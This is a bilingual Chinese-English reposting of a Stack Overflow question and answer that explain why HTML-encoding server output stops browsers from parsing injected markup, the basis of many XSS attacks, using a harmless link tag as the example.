为什么HTML编码会阻止某些XSS攻击? [英] Why does HTML encoding prevent certain XSS attacks?
问题描述
我一直在阅读你在从服务器到客户端(我认为?)的HTML编码方式,这将防止许多类型的XSS攻击。但是,我根本不明白。 HTML仍然会被浏览器消耗和渲染吗?
I have been reading that you HTML encode on the way back from the server to the client (I think?) and this will prevent many types of XSS attacks. However, I don't understand at all. The HTML is still going to be consumed and rendered by the browser right?
这是如何阻止任何事情的?
How is this stopping anything?
我在多个位置,网站和书籍中阅读过这些内容,但实际上并没有解释为什么 。
I've read about this in multiple locations, websites and books, and nowhere does it actually explain why this works.
推荐答案
想想看:编码 HTML是什么样子的?例如,它可能看起来像这样:
Think about it: What does encoded HTML look like? For example, it could look like this:
<a href="www.stackoverflow.com">
所以它会以文字形式呈现在客户端上(如< a href =www。 stackoverflow.com>),而不是HTML。这意味着您不会看到实际的链接,而是代码本身。
So it will be rendered on the client as the literals (as <a href="www.stackoverflow.com">), not as HTML. Meaning you won't see an actual link, but the code itself.
XSS攻击的工作原理是有人可以让客户端浏览器解析HTML,网站提供者不会不打算在那里;如果上面没有编码,这意味着提供的链接将被嵌入到网站中,尽管网站提供商不希望这样。
XSS attacks work on the basis that someone can make a client browser parse HTML that the site provider didn't intend to be on there; if the above weren't encoded, it would mean that the provided link would be embedded in the site, although the site provider didn't want that.
XSS是当然比这更精致一些,并且通常还涉及JavaScript(因此跨站点脚本),但出于演示目的,此简单示例应该足够了; JavaScript代码和简单的HTML代码一样,因为XSS是更一般的HTML注入的特例。
XSS is of course a little more elaborate than that, and usually involves JavaScript as well (hence the Cross Site Scripting), but for demonstration purposes this simple example should suffice; it's the same with JavaScript code as with simple HTML tags, since XSS is a special case of the more general HTML injection.
这篇关于为什么HTML编码会阻止某些XSS攻击?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!